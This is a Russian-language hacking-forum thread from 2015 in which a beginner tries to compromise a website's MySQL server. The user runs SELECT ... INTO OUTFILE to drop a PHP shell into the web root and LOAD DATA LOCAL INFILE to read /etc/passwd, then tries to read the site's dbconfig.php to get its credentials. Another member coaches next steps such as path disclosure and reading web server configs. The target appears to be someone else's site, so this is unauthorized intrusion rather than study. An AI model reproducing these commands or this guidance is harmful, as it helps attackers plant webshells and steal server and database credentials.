ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.12.2015, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
6208
Репутация:
0
|
|
Вообщем дело такое, я уже и гуглил, и у знакомых спрашивал, никто ничего не знает.
Возможно ли как-то разрешить File_priv через саму бд?
Выполняю запрос: SELECT shell FROM `shell` INTO OUTFILE '/blablabla/data/www/site.ru.su/22.php';
И скули выбивает ошибку: #1045 - Access denied for user 'shopsof'@'%' (using password: YES)
Можно ли что-то сделать в этой ситуации?
|
|
|
|
25.12.2015, 00:43
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
|
|
|
25.12.2015, 00:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
6208
Репутация:
0
|
|
Очень жаль :С
|
|
|
|
25.12.2015, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
6208
Репутация:
0
|
|
Я новичок в этой сфере, не понимаю что делать дальше.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'
Выдало:
Добавлено 2 строки.
Идентификатор вставленной строки: 945 ( Запрос занял 0.0004 сек. )
Что дальше?
|
|
|
|
25.12.2015, 11:39
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
таблицу test посмотрите
|
|
|
|
25.12.2015, 12:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
6208
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
таблицу test посмотрите Вбил так:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'
Зашел в табл, там такое:
http://i.imgur.com/YBBXi0U.png
Пытаюсь dbconfig.php открыть:
LOAD DATA LOCAL INFILE '/www/xxx.su/engine/data/dbconfig.php' INTO TABLE test FIELDS TERMINATED BY '\n'
Скули выбивает:
#2 - File '/www/xxx.su/engine/data/dbconfig.php' not found (Errcode: 2 "No such file or directory")
Что делать?
|
|
|
|
25.12.2015, 19:16
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все
|
|
|
|
25.12.2015, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
168184
Репутация:
40
|
|
Шел 2015 год, PHP 7 лежал в репозитории на GitHub, а люди все еще использовали MySQL 5.5 с FILE_PRIV=Y.
К чему это я?
Где вы откапываете этих мастодонтов?
|
|
|
|
25.12.2015, 20:50
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
да кому это интересно - апдейты делать?
|
|
|
|
25.12.2015, 21:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
6208
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все Можно пример, как можно найти пути?
В этой сфере я слаб...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
